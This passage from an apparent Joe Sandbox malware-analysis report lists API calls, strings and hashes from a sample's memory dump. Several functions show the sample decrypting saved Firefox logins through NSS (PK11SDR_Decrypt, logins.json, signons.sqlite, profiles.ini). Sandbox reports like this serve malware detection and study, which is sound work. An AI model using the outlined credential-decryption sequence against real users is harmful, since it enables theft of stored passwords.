                                                                                                                                                                          • Part of subcall function 0040AE5E: GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
                                                                                                                                                                          • Part of subcall function 0040AE5E: CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC
                                                                                                                                                                          • Part of subcall function 0040AF0C: _wcsicmp.MSVCRT ref: 0040AF46
                                                                                                                                                                        • memset.MSVCRT ref: 004071FD
                                                                                                                                                                        • memset.MSVCRT ref: 00407212
                                                                                                                                                                        • _wtoi.MSVCRT ref: 00407306
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040731A
                                                                                                                                                                        • memset.MSVCRT ref: 0040733B
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?), ref: 0040736F
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00407386
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040739D
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073B4
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073CB
                                                                                                                                                                          • Part of subcall function 00407150: _wtoi64.MSVCRT ref: 00407154
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073E2
                                                                                                                                                                          • Part of subcall function 00406FCE: memset.MSVCRT ref: 00406FF4
                                                                                                                                                                          • Part of subcall function 00406FCE: memset.MSVCRT ref: 00407008
                                                                                                                                                                          • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
                                                                                                                                                                          • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
                                                                                                                                                                          • Part of subcall function 00406FCE: strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
                                                                                                                                                                          • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
                                                                                                                                                                          • Part of subcall function 00406FCE: wcscpy.MSVCRT ref: 0040709D
                                                                                                                                                                          • Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
                                                                                                                                                                          • Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$memset$strcpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                        • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$logins$null$passwordField$timeCreated$timeLastUsed$timePasswordChanged$timesUsed$usernameField${@
                                                                                                                                                                        • API String ID: 249851626-1964116028
                                                                                                                                                                        • Opcode ID: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
                                                                                                                                                                        • Instruction ID: c3ecdf3b596e70815539cea729ffc079dd9e4b065ea23c8e33f814b0aa12875c
                                                                                                                                                                        • Opcode Fuzzy Hash: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
                                                                                                                                                                        • Instruction Fuzzy Hash: 48717FB1D40219AEEF10EBA2DC82DEEB778EF40318F1041BBB514B61D1DA785E548F69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004113C8 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • {Unknown}, xrefs: 00411492
                                                                                                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0041166F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                        • API String ID: 4111938811-1819279800
                                                                                                                                                                        • Opcode ID: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
                                                                                                                                                                        • Instruction ID: 77b13c0c11c75301577e42814f96b51b4b1d428f570956a2458bc96a91f7f52b
                                                                                                                                                                        • Opcode Fuzzy Hash: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
                                                                                                                                                                        • Instruction Fuzzy Hash: A17193B280021CBFEF219B51DD45EDA376DEB49355F04407BF608A2162EB79DE848F68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411760 Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 124libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00411781
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
                                                                                                                                                                        • memset.MSVCRT ref: 004117F1
                                                                                                                                                                        • wcslen.MSVCRT ref: 004117FE
                                                                                                                                                                        • wcslen.MSVCRT ref: 0041180D
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 004118CC
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 004118D8
                                                                                                                                                                          • Part of subcall function 00406B51: memset.MSVCRT ref: 00406B72
                                                                                                                                                                          • Part of subcall function 00406B51: memset.MSVCRT ref: 00406BBF
                                                                                                                                                                          • Part of subcall function 00406B51: RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
                                                                                                                                                                          • Part of subcall function 00406B51: wcscpy.MSVCRT ref: 00406D07
                                                                                                                                                                          • Part of subcall function 00406B51: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
                                                                                                                                                                          • Part of subcall function 00406B51: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                                                                                                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                        • API String ID: 2554026968-4029219660
                                                                                                                                                                        • Opcode ID: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
                                                                                                                                                                        • Instruction ID: 97ddbdf8ae905254a000a89cdfb80c97087349b9056a3f7eb9cac2f120fabdad
                                                                                                                                                                        • Opcode Fuzzy Hash: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
                                                                                                                                                                        • Instruction Fuzzy Hash: D2419271940308ABDB20AF61CC85E9AB7F8FF58344F10486FE295D3151EBB8D9848B5C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00407991 Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00411760: memset.MSVCRT ref: 00411781
                                                                                                                                                                          • Part of subcall function 00411760: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
                                                                                                                                                                          • Part of subcall function 00411760: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
                                                                                                                                                                          • Part of subcall function 00411760: memset.MSVCRT ref: 004117F1
                                                                                                                                                                          • Part of subcall function 00411760: wcslen.MSVCRT ref: 004117FE
                                                                                                                                                                          • Part of subcall function 00411760: wcslen.MSVCRT ref: 0041180D
                                                                                                                                                                          • Part of subcall function 00411760: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
                                                                                                                                                                          • Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
                                                                                                                                                                          • Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
                                                                                                                                                                          • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
                                                                                                                                                                          • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
                                                                                                                                                                          • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
                                                                                                                                                                          • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
                                                                                                                                                                          • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
                                                                                                                                                                        • memset.MSVCRT ref: 004079D1
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
                                                                                                                                                                        • memset.MSVCRT ref: 00407A23
                                                                                                                                                                        • memset.MSVCRT ref: 00407A3B
                                                                                                                                                                        • memset.MSVCRT ref: 00407A53
                                                                                                                                                                        • memset.MSVCRT ref: 00407A6B
                                                                                                                                                                        • memset.MSVCRT ref: 00407A83
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407A8E
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407A9C
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407ACB
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407AD9
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407B08
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407B16
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407B45
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407B53
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407B82
                                                                                                                                                                        • wcslen.MSVCRT ref: 00407B90
                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB
                                                                                                                                                                          • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                          • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                          • Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254
                                                                                                                                                                          • Part of subcall function 0040744D: memset.MSVCRT ref: 0040748C
                                                                                                                                                                          • Part of subcall function 0040744D: memset.MSVCRT ref: 0040750B
                                                                                                                                                                          • Part of subcall function 0040744D: memset.MSVCRT ref: 00407520
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcslen$memset$AddressProc$CurrentDirectory$LibraryLoad$AttributesByteCharFileHandleModuleMultiWidewcscatwcscpy
                                                                                                                                                                        • String ID: logins.json$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                                                                                                                        • API String ID: 3287676187-2852686199
                                                                                                                                                                        • Opcode ID: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
                                                                                                                                                                        • Instruction ID: 7d0a504a01980ca961e130c4bf0e7e2836c0561e9ae5ad9b50c10663cf81d5b6
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F91947180811DABEF11EF51DC41A9E77B8FF44319F1004ABF908E2191EB79AA548B9A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00411158 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 171COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
                                                                                                                                                                        • String ID: General$IsRelative$Path$Profile%d$profiles.ini
                                                                                                                                                                        • API String ID: 3014334669-2600475665
                                                                                                                                                                        • Opcode ID: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
                                                                                                                                                                        • Instruction ID: c42e31a804922eed0ec5ba890dd8b4603cdc71837868ac6ae30ebb97505d8267
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D51557290122CAAEB20EB55CD45FDEB7BCAF55344F1040E7B508A2151EF789B848F99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040EB6D Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 274windowregistryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040B5D4: LoadMenuW.USER32 ref: 0040B5DC
                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 0040EC7A
                                                                                                                                                                        • CreateStatusWindowW.COMCTL32(50000000,Function_0004552C,?,00000101), ref: 0040EC95
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040ECAD
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040ECBC
                                                                                                                                                                        • LoadImageW.USER32 ref: 0040ECC9
                                                                                                                                                                        • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040ECF3
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040ED00
                                                                                                                                                                        • CreateWindowExW.USER32 ref: 0040ED27
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040EDEF
                                                                                                                                                                        • ShowWindow.USER32(?,?), ref: 0040EE25
                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00453928), ref: 0040EE56
                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,00453928), ref: 0040EE66
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040EE6D
                                                                                                                                                                        • wcslen.MSVCRT ref: 0040EE7B
                                                                                                                                                                        • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040EEC8
                                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040EF02
                                                                                                                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040EF15
                                                                                                                                                                          • Part of subcall function 00403D7A: wcslen.MSVCRT ref: 00403D97
                                                                                                                                                                          • Part of subcall function 00403D7A: SendMessageW.USER32(?,00001061,?,?), ref: 00403DBB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$SendWindow$Createwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterShowStatusTempToolbarmemcpy
                                                                                                                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                        • API String ID: 1225797202-2103577948
                                                                                                                                                                        • Opcode ID: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
                                                                                                                                                                        • Instruction ID: 8c9b3575536fccf7ef0877cb0e8d9f23cb5666ec72f10922821c14b88f39767b
                                                                                                                                                                        • Opcode Fuzzy Hash: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
                                                                                                                                                                        • Instruction Fuzzy Hash: B5B1A271540388AFEF11DF64CC89BCA7FA5AF55304F0404BAFA48AF292C7B99544CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403768 Relevance: 36.1, APIs: 24, Instructions: 84windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0B9
                                                                                                                                                                          • Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0CE
                                                                                                                                                                          • Part of subcall function 0040E076: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
                                                                                                                                                                          • Part of subcall function 0040E076: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
                                                                                                                                                                          • Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
                                                                                                                                                                          • Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
                                                                                                                                                                          • Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
                                                                                                                                                                          • Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
                                                                                                                                                                          • Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
                                                                                                                                                                          • Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
                                                                                                                                                                          • Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E19F
                                                                                                                                                                          • Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
                                                                                                                                                                          • Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E1BC
                                                                                                                                                                          • Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
                                                                                                                                                                          • Part of subcall function 0040E076: GetSysColor.USER32(0000000F), ref: 0040E1D5
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040377A
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000072), ref: 00403785
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403796
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040379A
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000074), ref: 0040379F
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 004037AA
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037AE
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000073), ref: 004037B3
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 004037BE
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037C2
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000075), ref: 004037C7
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 004037D2
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037D6
                                                                                                                                                                        • LoadIconW.USER32(00000000,0000006F), ref: 004037DB
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 004037E6
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037EA
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000076), ref: 004037EF
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 004037FA
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004037FE
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000077), ref: 00403803
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 0040380E
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403812
                                                                                                                                                                        • LoadIconW.USER32(00000000,00000070), ref: 00403817
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 00403822
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconImage$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 715923342-0
                                                                                                                                                                        • Opcode ID: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
                                                                                                                                                                        • Instruction ID: b7e10a9324f3d83bf9194ece928487740f847c1137f1a2c01f1b8e69b6e47de2
                                                                                                                                                                        • Opcode Fuzzy Hash: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
                                                                                                                                                                        • Instruction Fuzzy Hash: 1711F160B857087AFA3137B2DC4BF7B7A5EDF81B85F114414F35D990E0C9E6AC105928
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00443D20 Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(0040BDC4,?,00000000), ref: 00443D36
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00443D51
                                                                                                                                                                        • GetFileVersionInfoW.VERSION(0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D61
                                                                                                                                                                        • VerQueryValueW.VERSION(00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443D74
                                                                                                                                                                        • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0044A4B4,0040BDC4,?,0040BDC4,00000000,?,00000000,00000000,0040BDC4,?,00000000), ref: 00443DB1
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 00443DD1
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00443DFB
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00443EAB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                        • API String ID: 1223191525-1542517562
                                                                                                                                                                        • Opcode ID: f160691ecdb482a839b0d8bd7ec2443cf0dfcac9d5922b70f5c8bd6361710c8c
                                                                                                                                                                        • Instruction ID: f644ee0d2354bfc8442d092a800b66c1527b1609597f5fb91e8fdc391f94498a
                                                                                                                                                                        • Opcode Fuzzy Hash: f160691ecdb482a839b0d8bd7ec2443cf0dfcac9d5922b70f5c8bd6361710c8c
                                                                                                                                                                        • Instruction Fuzzy Hash: 164133B2900218BAEB04EFA1DD82DDEB7BCAF48704F110517B515A3142DB78EA559BA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E076 Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040E0B9
                                                                                                                                                                        • memset.MSVCRT ref: 0040E0CE
                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
                                                                                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E117
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E122
                                                                                                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
                                                                                                                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
                                                                                                                                                                        • LoadImageW.USER32 ref: 0040E19F
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
                                                                                                                                                                        • LoadImageW.USER32 ref: 0040E1BC
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0040E1D5
                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040E1F0
                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040E200
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040E20C
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040E212
                                                                                                                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040E22F
